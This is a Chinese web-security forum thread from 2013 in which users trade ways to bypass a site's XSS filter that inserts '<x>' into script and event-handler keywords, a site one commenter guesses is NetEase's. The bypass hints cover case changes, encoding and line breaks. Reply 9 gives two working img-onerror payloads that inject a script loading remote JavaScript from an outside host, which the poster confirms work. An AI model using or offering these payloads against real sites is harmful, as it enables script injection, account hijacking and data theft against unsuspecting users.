script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x>

  • A+
所属分类:WEB安全

script 变成sc<x>ript,还有javascript onload onmouseover 基本都是加入捣蛋的<x> 
我在想,之前ewebeditor,style样式添加,asaspp来拿shell。那么这个<x>,可不可以也这样绕过呢。对了String.fromCharCode(47,120,115,115,46,114,101,47,54,5)里的数字会自动去掉,变成String.fromCharCode(471201151154611410147545)。URI编码也照样解析后加入<x>. 

总之我这几个小时一直研究,被<x>弄疯了。各位大牛,能给下思路吗?

1#醉入红尘梦 | 2013-12-15 02:10

已经搞定

 

2#blast | 2013-12-15 02:14

网易么。。记得网易有个手机站就是这么风骚。。

 

3#核攻击 | 2013-12-15 09:51

大小写、编码、回车换行字符

 

4#H.Shao | 2013-12-15 14:34

@醉入红尘梦 求搞定方法。技术交流

 

5#1ee | 2013-12-15 16:39

@醉入红尘梦 同求搞定方法

 

6#醉入红尘梦 | 2013-12-15 21:50

@核攻击 核总威武。顺便问下怎么加载js

 

7#D&G | 2013-12-16 09:24

@醉入红尘梦 搞定了不分享么

 

8#Oops | 2013-12-16 10:55

2013-12-15 00:47---------->>2013-12-15 02:10

LZ搞了83分钟搞好了,为什么不分享!

自娱自乐啊,自问自答啊!

 

9#核攻击 | 2013-12-16 10:59

@醉入红尘梦 

<img src=# onerror=javascript:document.write('<scr'+'ipt src=\'http://lcx.cc/1.js\'></scr'+'ipt>')></img>

<img src=# onerror=javascript:window.s=document.createElement('script');window.s.src='http://lcx.cc/1.js';document.body.appendChild(window.s);></img>

 

10#醉入红尘梦 | 2013-12-16 20:41

@Oops @1ee @H.Shao @D&G @核攻击 就是核总这个代码。但是核总,字符限制到60个。而且onerror也添加?<x>,发现+都过滤。。

 

11#猫头鹰 | 2013-12-17 08:41

我是不会告诉你我也遇到这个问题的~妈的恶心死了

 

12#Manning | 2013-12-20 14:47

前端限制字符,不一定服务器端限制字符数目啊

 

13#猫头鹰 | 2014-03-24 18:14

楼主你得绕过在哪里

 

14#Airbasic | 2014-03-25 11:03

楼主求细节啊

 

15#我来找快乐 | 2014-03-25 11:52

LZ不厚道,自己过了就不发细节


  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: